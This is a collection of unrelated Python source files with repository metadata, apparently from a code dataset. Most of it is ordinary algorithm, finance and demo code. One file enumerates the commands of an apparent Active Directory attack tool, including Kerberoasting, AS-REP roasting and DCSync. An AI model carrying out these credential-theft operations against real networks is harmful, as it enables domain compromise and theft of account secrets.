template = Template('\n <h2>$title</h2>\n\n <form action="./store" method="POST">\n <input type="hidden" name="id" value="$id" />\n Last Name: <input name="lastName" value="$getVar(\'contact.lastName\', \'\')" /><br/>\n First Name: <input name="firstName" value="$getVar(\'contact.firstName\', \'\')" /><br/>\n Phone: <input name="phone" value="$getVar(\'contact.phone\', \'\')" /><br/>\n Email: <input name="email" value="$getVar(\'contact.email\', \'\')" /><br/>\n URL: <input name="url" value="$getVar(\'contact.url\', \'\')" /><br/>\n <input type="submit" value="Store" />\n </form>\n ', [locals(), globals()])
return template.respond()
edit.exposed = True
def delete(self, id):
contact = Contact.get(int(id))
contact.destroySelf()
return 'Deleted. <a href="./">Return to Index</a>'
delete.exposed = True
def store(self, lastName, firstName, phone, email, url, id = None):
if id and int(id) > 0:
contact = Contact.get(int(id))
contact.set(lastName=lastName, firstName=firstName, phone=phone, email=email, url=url)
else:
contact = Contact(lastName=lastName, firstName=firstName, phone=phone, email=email, url=url)
return 'Stored. <a href="./">Return to Index</a>'
store.exposed = True
def reset(self):
Contact.dropTable(True)
Contact.createTable()
Contact(firstName='Hendrik', lastName='Mans', email='hendrik@mans.de', phone='++49 89 12345678', url='http://www.mornography.de')
return 'reset completed!'
reset.exposed = True
print "If you're running this application for the first time, please go to http://localhost:8080/reset once in order to create the database!"
cherrypy.quickstart(ContactManager())
| [
"billchang.e@gmail.com"
] | billchang.e@gmail.com |
7be5c1610311e38a44408af45228a5092697cb36 | 9e765b38a03c2996e221a42c2a0dbc0fe02824cb | /general_interview_qs/serialize_deserialize_binary_tree/binary_search_tree.py | 7d69deb9bc0240ce5a5c30d0940e79d08821b1f2 | [
"Apache-2.0"
] | permissive | angelusualle/algorithms | f709b4ae0c3275cece204d5fb56fd6ec34b4683b | 86286a49db2a755bc57330cb455bcbd8241ea6be | refs/heads/main | 2023-07-02T19:25:11.720114 | 2021-08-12T16:33:00 | 2021-08-12T16:33:00 | 269,791,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | import json
class Node():
def __init__(self, value):
self.value = value
self.left_child = None
self.right_child = None
def serialize_bst(root):
return json.dumps(serialize_bst_recursive(root))
def serialize_bst_recursive(root):
return root and (root.value, serialize_bst_recursive(root.left_child), serialize_bst_recursive(root.right_child))
def deserialize_bst(data):
return deserialize_bst_recursive(json.loads(data))
def deserialize_bst_recursive(data):
if data:
root = Node(data[0])
root.left_child = deserialize_bst_recursive(data[1])
root.right_child = deserialize_bst_recursive(data[2])
return root | [
"angelusualle@gmail.com"
] | angelusualle@gmail.com |
3cce911205ad7d207806b4df38a18d5029619084 | 9b20743ec6cd28d749a4323dcbadb1a0cffb281b | /11_Time_Series_Forecasting_with_Python/08/random_walk_persistence.py | 0a9ec3767d6c6e19c7e37f6146090e3366394702 | [] | no_license | jggrimesdc-zz/MachineLearningExercises | 6e1c7e1f95399e69bba95cdfe17c4f8d8c90d178 | ee265f1c6029c91daff172b3e7c1a96177646bc5 | refs/heads/master | 2023-03-07T19:30:26.691659 | 2021-02-19T08:00:49 | 2021-02-19T08:00:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # persistence forecasts for a random walk
from math import sqrt
from random import random
from random import seed
from sklearn.metrics import mean_squared_error
# generate the random walk
seed(1)
random_walk = list()
random_walk.append(-1 if random() < 0.5 else 1)
for i in range(1, 1000):
movement = -1 if random() < 0.5 else 1
value = random_walk[i - 1] + movement
random_walk.append(value)
# prepare dataset
train_size = int(len(random_walk) * 0.66)
train, test = random_walk[0:train_size], random_walk[train_size:]
# persistence
predictions = list()
history = train[-1]
for i in range(len(test)):
yhat = history
predictions.append(yhat)
history = test[i]
rmse = sqrt(mean_squared_error(test, predictions))
print('Persistence RMSE: %.3f' % rmse)
| [
"jgrimes@jgrimes.tech"
] | jgrimes@jgrimes.tech |
32a2d37244020f9f94575b7edd8b299c75941baa | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03131/s755210567.py | 2089454a42165092751754963ddeb69a197d66c8 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | K, A, B = map(int, input().split())
if B - A <= 2:
print(K + 1)
else:
ans = 0
# 初回のA枚→B枚まで A-1 回かかる
rest = K - A + 1
# このときにはA枚持っている
ans += A
# 残りをすべてA枚→B枚
ans += rest // 2 * (B - A)
if rest % 2 != 0:
ans += 1
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
7379d7c195155642ce162043732d4f0040240093 | 3ad8887aca54daa74b1fe446cb35cd0902e1e9bd | /jackdaw/nest/ws/protocol/cmdtypes.py | dcd8aaa5c412c3cc29a7fc3200dcf7f1c5990f79 | [] | no_license | huangzccn/jackdaw | 6ea5f3f7901c1c64b469ea4c25de0e77a3fc49a2 | 1a9800152fb8f19d5db43fcd235f45f6db2e3878 | refs/heads/master | 2023-08-29T11:44:46.692776 | 2021-10-23T20:00:36 | 2021-10-23T20:00:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,745 | py | import enum
class NestOpCmd(enum.Enum):
GATHER = 'GATHER'
KERBEROAST = 'KERBEROAST'
KERBEROASTRES = 'KERBEROASTRES'
ASREPROAST = 'ASREPROAST'
ASREPROASTRES = 'ASREPROASTRES'
KERBEROSTGS = 'KERBEROSTGS'
KERBEROSTGSRES = 'KERBEROSTGSRES'
KERBEROSTGT = 'KERBEROSTGT'
KERBEROSTGTRES = 'KERBEROSTGTRES'
SMBSESSIONS = 'SMBSESSIONS'
SMBFILES = 'SMBFILES'
SMBDCSYNC = 'SMBDCSYNC'
PATHSHORTEST = 'PATHSHORTEST'
PATHDA = 'PATHDA'
GETOBJINFO = 'GETOBJINFO'
CHANGEAD = 'CHANGEAD'
LISTADS = 'LISTADS'
LISTADSRES = 'LISTADSRES'
OK = 'OK'
ERR = 'ERR'
LOG = 'LOG'
CANCEL = 'CANCEL'
TCPSCAN = 'TCPSCAN'
TCPSCANRES = 'TCPSCANRES'
PATHRES = 'PATHRES'
GATHERSTATUS = 'GATHERSTATUS'
USERRES = 'USERRES'
COMPUTERRES = 'COMPUTERRES'
SMBSESSIONRES = 'SMBSESSIONRES'
SMBSHARERES = 'SMBSHARERES'
SMBLOCALGROUPRES = 'SMBLOCALGROUPRES'
LOADAD = 'LOADAD'
GROUPRES = 'GROUPRES'
EDGERES = 'EDGERES'
EDGEBUFFRES = 'EDGEBUFFRES'
USERBUFFRES = 'USERBUFFRES'
GROUPBUFFRES = 'GROUPBUFFRES'
COMPUTERBUFFRES = 'COMPUTERBUFFRES'
SMBSHAREBUFFRES = 'SMBSHAREBUFFRES'
SMBFILERES = 'SMBFILERES'
ADDCRED = 'ADDCRED'
LISTCRED = 'LISTCRED'
GETCRED = 'GETCRED'
CREDRES = 'CREDRES'
ADDTARGET = 'ADDTARGET'
LISTTARGET = 'LISTTARGET'
GETTARGET = 'GETTARGET'
TARGETRES = 'TARGETRES'
LISTGRAPHS = 'LISTGRAPHS'
CHANGEGRAPH = 'CHANGEGRAPH'
LOADGRAPH = 'LOADGRAPH'
LISTGRAPHRES = 'LISTGRAPHRES'
LISTAGENTS = 'LISTAGENTS'
AGENT = 'AGENT'
OBJOWNED = 'OBJOWNED'
OBJHVT = 'OBJHVT'
WSNETROUTERCONNECT = 'WSNETROUTERCONNECT'
WSNETROUTERDISCONNECT = 'WSNETROUTERDISCONNECT'
NOTIFY = 'NOTIFY'
WSNETROUTER = 'WSNETROUTER'
WSNETLISTROUTERS = 'WSNETLISTROUTERS'
PATHKERB = 'PATHKERB'
PATHASREP = 'PATHASREP'
PATHOWNED = 'PATHOWNED' | [
"info@skelsec.com"
] | info@skelsec.com |
463916eb7f9d2c84f8495c3cd2cf86f69b7f2b47 | b0d0e585c82b29aaabcb141f9f54280559abac69 | /Datastructures/spiral.py | 2b6df640797337c222abd54d3fabf6c6e852253b | [] | no_license | prem1806/python-practice-files | 32a6eb7236a9779dec0fb75d3792c34533e6491c | 3f152e4b62fb7f81e5113dced06b4dc7cce4b440 | refs/heads/master | 2021-05-29T16:59:00.349844 | 2015-10-06T17:58:56 | 2015-10-06T17:58:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 866 | py | def auto(A):
m = len(A)
n = len(A[0])
T = 0
B = m - 1
L = 0
R = n - 1
direction = 0
ret = []
while T <= B and L <= R:
if (direction == 0):
for i in range(L,R+1):
ret.append(A[T][i])
T += 1
direction = 1
elif direction == 1:
for i in range(T,B+1):
ret.append(A[i][R])
R -= 1
direction = 2
elif direction == 2:
for i in range(R, L - 1, -1):
ret.append(A[B][i])
B -= 1
direction = 3
else:
for i in range(B,T-1, -1):
ret.append(A[i][L])
L += 1
direction = 0
return ret
A = [[1,2,3,4,5],[9,5,3,6,6,9,3],[1,5,3,8,6,4,2]]
print auto(A)
| [
"rohith.uppala369@gmail.com"
] | rohith.uppala369@gmail.com |
d4ed1afb2f18e5872a87afc51949c67782c4d55e | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_cams.py | 79899c97da6b6f7a5750ef111987199a2e5323fe | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py |
from xai.brain.wordbase.nouns._cam import _CAM
#calss header
class _CAMS(_CAM, ):
def __init__(self,):
_CAM.__init__(self)
self.name = "CAMS"
self.specie = 'nouns'
self.basic = "cam"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
7b9daa4441128b06633740c95f5e340acebeb07f | 1df4cd78ad04d241547007e307c54236efbea400 | /gateway/finance/performance/tracker.py | 8e45259e298d289af653434554dfb2fdfe08a708 | [] | no_license | dudulangaaa/gateway | c878ec6a12ba81d936b63b4126355b9fb45fde19 | a3e709f0d5d5f778b9c195368640078ce93d743a | refs/heads/master | 2021-05-01T16:05:58.922582 | 2018-02-09T04:47:35 | 2018-02-09T04:47:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,867 | py | #
# Copyright 2016 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Performance Tracking
====================
+-----------------+----------------------------------------------------+
| key | value |
+=================+====================================================+
| period_start | The beginning of the period to be tracked. datetime|
| | in pytz.utc timezone. Will always be 0:00 on the |
| | date in UTC. The fact that the time may be on the |
| | prior day in the exchange's local time is ignored |
+-----------------+----------------------------------------------------+
| period_end | The end of the period to be tracked. datetime |
| | in pytz.utc timezone. Will always be 23:59 on the |
| | date in UTC. The fact that the time may be on the |
| | next day in the exchange's local time is ignored |
+-----------------+----------------------------------------------------+
| progress | percentage of test completed |
+-----------------+----------------------------------------------------+
| capital_base | The initial capital assumed for this tracker. |
+-----------------+----------------------------------------------------+
| cumulative_perf | A dictionary representing the cumulative |
| | performance through all the events delivered to |
| | this tracker. For details see the comments on |
| | :py:meth:`PerformancePeriod.to_dict` |
+-----------------+----------------------------------------------------+
| todays_perf | A dictionary representing the cumulative |
| | performance through all the events delivered to |
| | this tracker with datetime stamps between last_open|
| | and last_close. For details see the comments on |
| | :py:meth:`PerformancePeriod.to_dict` |
| | TODO: adding this because we calculate it. May be |
| | overkill. |
+-----------------+----------------------------------------------------+
| cumulative_risk | A dictionary representing the risk metrics |
| _metrics | calculated based on the positions aggregated |
| | through all the events delivered to this tracker. |
| | For details look at the comments for |
| | :py:meth:`zipline.finance.risk.RiskMetrics.to_dict`|
+-----------------+----------------------------------------------------+
"""
from __future__ import division
import logbook
import pandas as pd
from pandas.tseries.tools import normalize_date
# from zipline.finance.performance.period import PerformancePeriod
from gateway.finance.performance.period import PerformancePeriod
from zipline.errors import NoFurtherDataError
# import zipline.finance.risk as risk
import gateway.finance.risk as risk
from . position_tracker import PositionTracker
log = logbook.Logger('Performance')
class PerformanceTracker(object):
"""
Tracks the performance of the algorithm.
"""
    def __init__(self, sim_params, trading_calendar, env):
        """Set up the tracker's cumulative and daily performance periods.

        Parameters
        ----------
        sim_params : object
            Simulation parameters; supplies the session range, capital
            base, data frequency, and emission rate used below.
        trading_calendar : object
            Calendar used to resolve each session's open/close times.
        env : object
            Trading environment; supplies the asset finder and the
            treasury curves consumed by the risk metrics.
        """
        self.sim_params = sim_params
        self.trading_calendar = trading_calendar
        self.asset_finder = env.asset_finder
        self.treasury_curves = env.treasury_curves

        # Boundaries of the whole simulation, taken from sim_params.
        self.period_start = self.sim_params.start_session
        self.period_end = self.sim_params.end_session
        self.last_close = self.sim_params.last_close
        self._current_session = self.sim_params.start_session
        # Open/close timestamps for the first session; advanced as the
        # simulation moves to later sessions.
        self.market_open, self.market_close = \
            self.trading_calendar.open_and_close_for_session(
                self._current_session
            )
        self.total_session_count = len(self.sim_params.sessions)
        self.capital_base = self.sim_params.capital_base
        self.emission_rate = sim_params.emission_rate

        # Shared position state; both performance periods reference it.
        self.position_tracker = PositionTracker(
            data_frequency=self.sim_params.data_frequency
        )

        # Benchmark-return storage and risk metrics are indexed per
        # session (daily) or per minute, depending on the emission rate.
        if self.emission_rate == 'daily':
            self.all_benchmark_returns = pd.Series(
                index=self.sim_params.sessions
            )
            self.cumulative_risk_metrics = \
                risk.RiskMetricsCumulative(
                    self.sim_params,
                    self.treasury_curves,
                    self.trading_calendar
                )
        elif self.emission_rate == 'minute':
            self.all_benchmark_returns = pd.Series(index=pd.date_range(
                self.sim_params.first_open, self.sim_params.last_close,
                freq='Min')
            )

            self.cumulative_risk_metrics = \
                risk.RiskMetricsCumulative(
                    self.sim_params,
                    self.treasury_curves,
                    self.trading_calendar,
                    create_first_day_stats=True
                )

        # this performance period will span the entire simulation from
        # inception.
        self.cumulative_performance = PerformancePeriod(
            # initial cash is your capital base.
            starting_cash=self.capital_base,
            data_frequency=self.sim_params.data_frequency,
            # the cumulative period will be calculated over the entire test.
            period_open=self.period_start,
            period_close=self.period_end,
            # don't save the transactions for the cumulative
            # period
            keep_transactions=False,
            keep_orders=False,
            # don't serialize positions for cumulative period
            serialize_positions=False,
            name="Cumulative"
        )
        self.cumulative_performance.position_tracker = self.position_tracker

        # this performance period will span just the current market day
        self.todays_performance = PerformancePeriod(
            # initial cash is your capital base.
            starting_cash=self.capital_base,
            data_frequency=self.sim_params.data_frequency,
            # the daily period will be calculated for the market day
            period_open=self.market_open,
            period_close=self.market_close,
            keep_transactions=True,
            keep_orders=True,
            serialize_positions=True,
            name="Daily"
        )
        self.todays_performance.position_tracker = self.position_tracker

        # Most recently processed timestamp (updated in minute mode).
        self.saved_dt = self.period_start
        # one indexed so that we reach 100%
        self.session_count = 0.0
        self.txn_count = 0

        # The account object is rebuilt lazily; see get_account().
        self.account_needs_update = True
        self._account = None
def __repr__(self):
return "%s(%r)" % (
self.__class__.__name__,
{'simulation parameters': self.sim_params})
@property
def progress(self):
if self.emission_rate == 'minute':
# Fake a value
return 1.0
elif self.emission_rate == 'daily':
return self.session_count / self.total_session_count
def set_date(self, date):
if self.emission_rate == 'minute':
self.saved_dt = date
self.todays_performance.period_close = self.saved_dt
def get_portfolio(self, performance_needs_update):
if performance_needs_update:
self.update_performance()
self.account_needs_update = True
return self.cumulative_performance.as_portfolio()
def update_performance(self):
# calculate performance as of last trade
self.cumulative_performance.calculate_performance()
self.todays_performance.calculate_performance()
def get_account(self, performance_needs_update):
if performance_needs_update:
self.update_performance()
self.account_needs_update = True
if self.account_needs_update:
self._update_account()
return self._account
def _update_account(self):
self._account = self.cumulative_performance.as_account()
self.account_needs_update = False
    def to_dict(self, emission_type=None):
        """
        Creates a dictionary representing the state of this tracker.
        Returns a dict object of the form described in header comments.

        emission_type selects which per-period packet is included
        ('daily' or 'minute'); anything else raises ValueError.
        """
        # Default to the emission rate of this tracker if no type is provided
        if emission_type is None:
            emission_type = self.emission_rate
        _dict = {
            'period_start': self.period_start,
            'period_end': self.period_end,
            'capital_base': self.capital_base,
            'cumulative_perf': self.cumulative_performance.to_dict(),
            'progress': self.progress,
            'cumulative_risk_metrics': self.cumulative_risk_metrics.to_dict()
        }
        if emission_type == 'daily':
            _dict['daily_perf'] = self.todays_performance.to_dict()
        elif emission_type == 'minute':
            # Minute packets are stamped with the tracker's current minute.
            _dict['minute_perf'] = self.todays_performance.to_dict(
                self.saved_dt)
        else:
            raise ValueError("Invalid emission type: %s" % emission_type)
        return _dict
    def prepare_capital_change(self, is_interday):
        """Insert sub-period dividers ahead of a capital change.

        The cumulative period always gets a divider; the daily period
        only needs one when the change happens intraday.
        """
        self.cumulative_performance.initialize_subperiod_divider()
        if not is_interday:
            # Change comes in the middle of day
            self.todays_performance.initialize_subperiod_divider()
    def process_capital_change(self, capital_change_amount, is_interday):
        """Apply *capital_change_amount* to both performance periods.

        An interday change adjusts the daily period's starting capital;
        an intraday change instead starts a new sub-period (see
        prepare_capital_change).
        """
        self.cumulative_performance.set_current_subperiod_starting_values(
            capital_change_amount)
        if is_interday:
            # Change comes between days
            self.todays_performance.adjust_period_starting_capital(
                capital_change_amount)
        else:
            # Change comes in the middle of day
            self.todays_performance.set_current_subperiod_starting_values(
                capital_change_amount)
    def process_transaction(self, transaction):
        """Record *transaction* in both performance periods and apply it
        to the position tracker."""
        self.txn_count += 1
        self.cumulative_performance.handle_execution(transaction)
        self.todays_performance.handle_execution(transaction)
        self.position_tracker.execute_transaction(transaction)
    def handle_splits(self, splits):
        """Apply share splits to positions; any residual cash returned by
        the position tracker is credited to both performance periods."""
        leftover_cash = self.position_tracker.handle_splits(splits)
        if leftover_cash > 0:
            self.cumulative_performance.handle_cash_payment(leftover_cash)
            self.todays_performance.handle_cash_payment(leftover_cash)
    def process_order(self, event):
        """Record an order event in both performance periods."""
        self.cumulative_performance.record_order(event)
        self.todays_performance.record_order(event)
    def process_commission(self, commission):
        """Apply a commission (mapping with 'asset' and 'cost' keys) to
        the affected position and to both performance periods."""
        asset = commission['asset']
        cost = commission['cost']
        self.position_tracker.handle_commission(asset, cost)
        self.cumulative_performance.handle_commission(cost)
        self.todays_performance.handle_commission(cost)
    def process_close_position(self, asset, dt, data_portal):
        """Synthesize and process a closing transaction for *asset*, if
        the position tracker decides one is needed (it may return None)."""
        txn = self.position_tracker. \
            maybe_create_close_position_transaction(asset, dt, data_portal)
        if txn:
            self.process_transaction(txn)
    def check_upcoming_dividends(self, next_session, adjustment_reader):
        """
        Check if we currently own any stocks with dividends whose ex_date is
        the next trading day. Track how much we should be paid on those
        dividends' pay dates.
        Then check if we are owed cash/stock for any dividends whose pay date
        is the next trading day. Apply all such benefits, then recalculate
        performance.
        """
        # Without adjustment data there is nothing to earn or pay.
        if adjustment_reader is None:
            return
        position_tracker = self.position_tracker
        held_sids = set(position_tracker.positions)
        # Dividends whose ex_date is the next trading day. We need to check if
        # we own any of these stocks so we know to pay them out when the pay
        # date comes.
        if held_sids:
            cash_dividends = adjustment_reader.get_dividends_with_ex_date(
                held_sids,
                next_session,
                self.asset_finder
            )
            stock_dividends = adjustment_reader. \
                get_stock_dividends_with_ex_date(
                    held_sids,
                    next_session,
                    self.asset_finder
                )
            position_tracker.earn_dividends(
                cash_dividends,
                stock_dividends
            )
        # Pay out dividends whose pay date is the next session; credit the
        # net cash to both performance periods.
        net_cash_payment = position_tracker.pay_dividends(next_session)
        if not net_cash_payment:
            return
        self.cumulative_performance.handle_dividends_paid(net_cash_payment)
        self.todays_performance.handle_dividends_paid(net_cash_payment)
    def handle_minute_close(self, dt, data_portal):
        """
        Handles the close of the given minute in minute emission.

        Parameters
        ----------
        dt : Timestamp
            The minute that is ending

        Returns
        -------
        A minute perf packet.
        """
        self.position_tracker.sync_last_sale_prices(dt, False, data_portal)
        self.update_performance()
        todays_date = normalize_date(dt)
        account = self.get_account(False)
        # Benchmark returns from today's open through this minute.
        bench_returns = self.all_benchmark_returns.loc[todays_date:dt]
        # cumulative returns
        bench_since_open = (1. + bench_returns).prod() - 1
        self.cumulative_risk_metrics.update(todays_date,
                                            self.todays_performance.returns,
                                            bench_since_open,
                                            account.leverage)
        minute_packet = self.to_dict(emission_type='minute')
        return minute_packet
    def handle_market_close(self, dt, data_portal):
        """
        Handles the close of the given day, in both minute and daily emission.
        In daily emission, also updates performance, benchmark and risk metrics
        as it would in handle_minute_close if it were minute emission.

        Parameters
        ----------
        dt : Timestamp
            The minute that is ending

        Returns
        -------
        A daily perf packet.
        """
        completed_session = self._current_session
        if self.emission_rate == 'daily':
            # this method is called for both minutely and daily emissions, but
            # this chunk of code here only applies for daily emissions. (since
            # it's done every minute, elsewhere, for minutely emission).
            self.position_tracker.sync_last_sale_prices(dt, False, data_portal)
            self.update_performance()
            account = self.get_account(False)
            benchmark_value = self.all_benchmark_returns[completed_session]
            self.cumulative_risk_metrics.update(
                completed_session,
                self.todays_performance.returns,
                benchmark_value,
                account.leverage)
        # increment the day counter before we move markers forward.
        self.session_count += 1.0
        # Get the next trading day and, if it is past the bounds of this
        # simulation, return the daily perf packet
        try:
            next_session = self.trading_calendar.next_session_label(
                completed_session
            )
        except NoFurtherDataError:
            next_session = None
        # Take a snapshot of our current performance to return to the
        # browser.
        daily_update = self.to_dict(emission_type='daily')
        # On the last day of the test, don't create tomorrow's performance
        # period. We may not be able to find the next trading day if we're at
        # the end of our historical data
        if self.market_close >= self.last_close:
            return daily_update
        # If the next trading day is irrelevant, then return the daily packet
        if (next_session is None) or (next_session >= self.last_close):
            return daily_update
        # move the market day markers forward
        # TODO Is this redundant with next_trading_day above?
        self._current_session = next_session
        self.market_open, self.market_close = \
            self.trading_calendar.open_and_close_for_session(
                self._current_session
            )
        # Roll over positions to current day.
        self.todays_performance.rollover()
        self.todays_performance.period_open = self.market_open
        self.todays_performance.period_close = self.market_close
        # Check for any dividends, then return the daily perf packet
        self.check_upcoming_dividends(
            next_session=next_session,
            adjustment_reader=data_portal._adjustment_reader
        )
        return daily_update
    def handle_simulation_end(self):
        """
        When the simulation is complete, run the full period risk report
        and send it out on the results socket.

        Returns the risk report as a dict.
        """
        log_msg = "Simulated {n} trading days out of {m}."
        log.info(log_msg.format(n=int(self.session_count),
                                m=self.total_session_count))
        log.info("first open: {d}".format(
            d=self.sim_params.first_open))
        log.info("last close: {d}".format(
            d=self.sim_params.last_close))
        # Benchmark (bms) and algorithm (ars) return series over the
        # continuous risk-metrics index.
        bms = pd.Series(
            index=self.cumulative_risk_metrics.cont_index,
            data=self.cumulative_risk_metrics.benchmark_returns_cont)
        ars = pd.Series(
            index=self.cumulative_risk_metrics.cont_index,
            data=self.cumulative_risk_metrics.algorithm_returns_cont)
        acl = self.cumulative_risk_metrics.algorithm_cumulative_leverages
        risk_report = risk.RiskReport(
            ars,
            self.sim_params,
            benchmark_returns=bms,
            algorithm_leverages=acl,
            trading_calendar=self.trading_calendar,
            treasury_curves=self.treasury_curves,
        )
        return risk_report.to_dict()
| [
"xiyongjian@hotmail.com"
] | xiyongjian@hotmail.com |
d8b1f1388e4a768f0006ce3f1ac5e57574bc519b | ce76b3ef70b885d7c354b6ddb8447d111548e0f1 | /time_or_world/see_long_case_under_year/early_day_or_hand.py | e5672fa966bf5cb831f37a71568f7efcaca277b6 | [] | no_license | JingkaiTang/github-play | 9bdca4115eee94a7b5e4ae9d3d6052514729ff21 | 51b550425a91a97480714fe9bc63cb5112f6f729 | refs/heads/master | 2021-01-20T20:18:21.249162 | 2016-08-19T07:20:12 | 2016-08-19T07:20:12 | 60,834,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 241 | py |
#! /usr/bin/env python
def early_fact(str_arg):
    """Echo *str_arg* through the helper, then print a fixed marker line."""
    place_and_young_government(str_arg)
    trailer = 'other_problem'
    print(trailer)
def place_and_young_government(str_arg):
    """Write *str_arg* to stdout, followed by a newline."""
    print(str(str_arg))
if __name__ == '__main__':
    # Script entry point: run the demo with a fixed sample string.
    early_fact('great_man_or_man')
| [
"jingkaitang@gmail.com"
] | jingkaitang@gmail.com |
e5f64d8df89dd8374d572ba638269fb1af708fd3 | c9e0227c3958db89747488328bd2b255e54f008f | /solutions/0748. Shortest Completing Word/0748.py | a4b585f171fb2752d25e76439753fa102ae11038 | [] | no_license | XkhldY/LeetCode | 2deba28b7491c36b4f224c3132fb89feea318832 | 94e23db2668615d9fe09e129a96c22ae4e83b9c8 | refs/heads/main | 2023-04-03T08:17:30.743071 | 2021-04-14T23:34:03 | 2021-04-14T23:34:03 | 358,136,537 | 1 | 0 | null | 2021-04-15T05:20:21 | 2021-04-15T05:20:21 | null | UTF-8 | Python | false | false | 492 | py | class Solution:
def shortestCompletingWord(self, licensePlate: str, words: List[str]) -> str:
def isMatch(word: str) -> bool:
wordCount = Counter(word)
return False if any(wordCount[i] < count[i] for i in string.ascii_letters) else True
ans = '*' * 16
count = defaultdict(int)
for c in licensePlate:
if c.isalpha():
count[c.lower()] += 1
for word in words:
if len(word) < len(ans) and isMatch(word):
ans = word
return ans
| [
"walkccray@gmail.com"
] | walkccray@gmail.com |
082c0a3a8132415b1544e97ea72366bcceaafef0 | b5b665097ef54459d85d4cc4bf0748f885a1ccdc | /quantopian/01-api/05-orders/04-get-order-methods.py | e3f23983a8fd5f035c588315a155dafdfb17f68b | [] | no_license | dylanjorgensen/financial-engineering | 76d769723fcc4eb26601e2abab9bcb8f60a49ef3 | f66b47ee8fcc15b599eab3af5040975b1ec7add2 | refs/heads/master | 2021-01-13T07:28:43.790685 | 2016-10-19T05:18:34 | 2016-10-19T05:18:34 | 71,321,116 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 76 | py |
# You can see the status of a specific order by calling get_order(order)
| [
"dylan@dylanjorgensen.com"
] | dylan@dylanjorgensen.com |
9da8ce2b393a9e221c614b46da6993a8350023c7 | 2b0eab74af8d23244ff11699830f9bb10fbd717a | /visit_report/migrations/0051_remove_cite_steps.py | 76dc57044caf2e095a4415fa7a366948cb1549e3 | [] | no_license | alexandrenorman/mixeur | c7e25cd20b03c78b361cb40e3e359a6dc5d9b06b | 95d21cd6036a99c5f399b700a5426e9e2e17e878 | refs/heads/main | 2023-03-13T23:50:11.800627 | 2021-03-07T15:49:15 | 2021-03-07T15:49:15 | 345,384,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | from django.db import migrations
def remove_cite_steps(apps, schema_editor):
    """Data-migration helper: delete obsolete 'cite' financing steps at
    the work-end milestone.

    Uses the historical model state via *apps* (standard RunPython
    signature; *schema_editor* is unused here).
    """
    Steps = apps.get_model('visit_report', 'Step')
    Steps.objects.filter(category="financing", milestone="work-end", nature="cite").delete()
class Migration(migrations.Migration):
    # Runs after the migration that added the prime renov step.
    dependencies = [
        ('visit_report', '0050_add_prime_renov_step'),
    ]
    operations = [
        # Pure data migration: delete obsolete CITE steps.
        # NOTE(review): no reverse_code is given, so this migration is
        # irreversible (the deleted rows cannot be restored on rollback).
        migrations.RunPython(remove_cite_steps),
    ]
| [
"norman@xael.org"
] | norman@xael.org |
0ef74428d763b21c1f13e563f623565510db01d0 | a3c662a5eda4e269a8c81c99e229879b946a76f6 | /.venv/lib/python3.7/site-packages/pylint/test/functional/star_needs_assignment_target_py35.py | 58e43dbacb50b64cee73eb2d348f19ea84d2a1ee | [
"MIT"
] | permissive | ahmadreza-smdi/ms-shop | 0c29da82c58b243507575672bbc94fb6e8068aeb | 65ba3f3061e2ac5c63115b08dadfe7d67f645fb6 | refs/heads/master | 2023-04-27T19:51:34.858182 | 2019-11-24T20:57:59 | 2019-11-24T20:57:59 | 223,616,552 | 6 | 2 | MIT | 2023-04-21T20:51:21 | 2019-11-23T16:09:03 | Python | UTF-8 | Python | false | false | 445 | py | """
Test PEP 0448 -- Additional Unpacking Generalizations
https://www.python.org/dev/peps/pep-0448/
"""
# pylint: disable=superfluous-parens
UNPACK_TUPLE = (*range(4), 4)
UNPACK_LIST = [*range(4), 4]
UNPACK_SET = {*range(4), 4}
UNPACK_DICT = {'a': 1, **{'b': '2'}}
UNPACK_DICT2 = {**UNPACK_DICT, "x": 1, "y": 2}
UNPACK_DICT3 = {**{'a': 1}, 'a': 2, **{'a': 3}}
UNPACK_IN_COMP = {elem for elem in (*range(10))} # [star-needs-assignment-target]
| [
"ahmadreza.smdi@gmail.com"
] | ahmadreza.smdi@gmail.com |
f2e355dfe0f62b71a7bc35dd20e268a5f7c5387a | 6ceeb3adb08da8754f59a117f39d401948988f0a | /spark/datadog_checks/spark/config_models/defaults.py | 30ebbb0df826f22f540c8c68a8b26011fb804c1b | [
"BSD-3-Clause",
"BSD-3-Clause-Modification",
"MIT",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"LGPL-2.1-only",
"LGPL-3.0-only",
"CC0-1.0",
"Unlicense",
"LicenseRef-scancode-unknown-license-reference"
